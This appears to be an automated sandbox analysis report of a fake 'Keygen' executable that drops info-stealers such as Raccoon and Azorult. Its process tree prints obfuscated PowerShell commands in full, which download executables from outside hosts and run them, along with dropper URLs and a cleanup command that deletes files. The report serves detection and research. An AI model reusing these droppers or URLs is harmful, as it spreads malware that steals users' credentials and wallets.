Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    152s
  • max time network
    139s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (16).exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 04:23:17 GMT Bot_ID: 750D7400-3B08-415E-A8B0-2695D81425F5_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: UCQFZDUI - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (519 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 2 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 52 IoCs
  • Loads dropped DLL 49 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (16).exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (16).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1536
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\BC4.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (16).exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1904
      • C:\Users\Admin\AppData\Local\Temp\BC4.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1944
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BC4.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:268
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1220
          • C:\Users\Public\nfv.exe
            "C:\Users\Public\nfv.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2592
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2784
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:3000
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 3000 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\267048048934635\\* & exit
                  8⤵
                    PID:1112
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 3000
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2432
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2828
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:3036
              • C:\Users\Public\nfv.exe
                "C:\Users\Public\nfv.exe"
                6⤵
                • Executes dropped EXE
                PID:3016
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BC4.tmp\m1.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:672
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1320
        • C:\Windows\SysWOW64\timeout.exe
          timeout 1
          3⤵
          • Delays execution with timeout.exe
          PID:560
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BC4.tmp\b.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1636
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1180
            • C:\Users\Public\baj.exe
              "C:\Users\Public\baj.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2424
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                6⤵
                • Loads dropped DLL
                PID:2312
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2728
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                    8⤵
                    • Loads dropped DLL
                    PID:3016
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2632
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                        10⤵
